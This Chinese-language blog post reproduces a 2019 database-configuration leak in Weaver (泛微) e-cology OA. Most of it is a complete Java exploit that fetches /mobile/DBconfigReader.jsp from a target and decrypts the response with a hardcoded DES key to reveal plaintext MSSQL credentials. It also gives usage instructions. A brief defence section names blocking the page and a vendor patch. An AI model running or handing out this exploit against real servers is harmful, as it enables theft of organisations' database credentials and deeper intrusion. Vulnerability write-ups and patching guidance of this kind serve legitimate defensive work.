首页 » NetworkSec » Penetration » 正文

泛微OA数据库(MSSQL)配置泄露漏洞重现

0x00 概述

201910,网上爆出泛微数据库(MSSQL)配置泄露漏洞,攻击者可以通过漏洞页面DBconfigReader.jsp将获取的的内容解密,可得到明文数据库配置。

影响范围包括不限于8.0、9.0版。

 

0x01 漏洞重现

利用ecologyexp.jar

 

package com;

 

import org.apache.http.HttpEntity;

import org.apache.http.client.methods.CloseableHttpResponse;

import org.apache.http.client.methods.HttpGet;

import org.apache.http.impl.client.CloseableHttpClient;

import org.apache.http.impl.client.HttpClientBuilder;

import org.apache.http.util.EntityUtils;

 

import javax.crypto.Cipher;

import javax.crypto.SecretKey;

import javax.crypto.SecretKeyFactory;

import javax.crypto.spec.DESKeySpec;

import java.security.SecureRandom;

 

public class ReadDbConfig {

private final static String DES = “DES”;

private final static String key = “1z2x3c4v5b6n”;

 

public static void main(String[] args) throws Exception {

if(args[0]!=null&& args[0].length() !=0){

String url = args[0]+”/mobile/DBconfigReader.jsp”;

System.out.println(ReadConfig(url));

}else{

System.err.print(“use: java -jar ecologyExp  http://127.0.0.1”);

}

}

 

private static String ReadConfig(String url) throws Exception {

CloseableHttpClient httpClient = HttpClientBuilder.create().build();

HttpGet httpGet = new HttpGet(url);

CloseableHttpResponse response = httpClient.execute(httpGet);

HttpEntity responseEntity = response.getEntity();

 

byte[] res1 = EntityUtils.toByteArray(responseEntity);

 

byte[] data = subBytes(res1,10,res1.length-10);

 

byte [] finaldata =decrypt(data,key.getBytes());

 

return (new String(finaldata));

}

 

private static byte[] decrypt(byte[] data, byte[] key) throws Exception {

 

SecureRandom sr = new SecureRandom();

DESKeySpec dks = new DESKeySpec(key);

SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(DES);

SecretKey securekey = keyFactory.generateSecret(dks);

Cipher cipher = Cipher.getInstance(DES);

cipher.init(Cipher.DECRYPT_MODE, securekey, sr);

 

return cipher.doFinal(data);

}

 

public static byte[] subBytes(byte[] src, int begin, int count) {

byte[] bs = new byte[count];

System.arraycopy(src, begin, bs, 0, count);

return bs;

}

}

 

可能会出现两种错误

0x02 防御方案

1. 禁止访问DBconfigReader.jsp

2.补丁

https://www.weaver.com.cn/cs/package/JDK/Ecology_security_DB_20191024.zip

 

0x03 参考资料

https://blog.csdn.net/sun1318578251/article/details/102760378

Comment

please input captcha *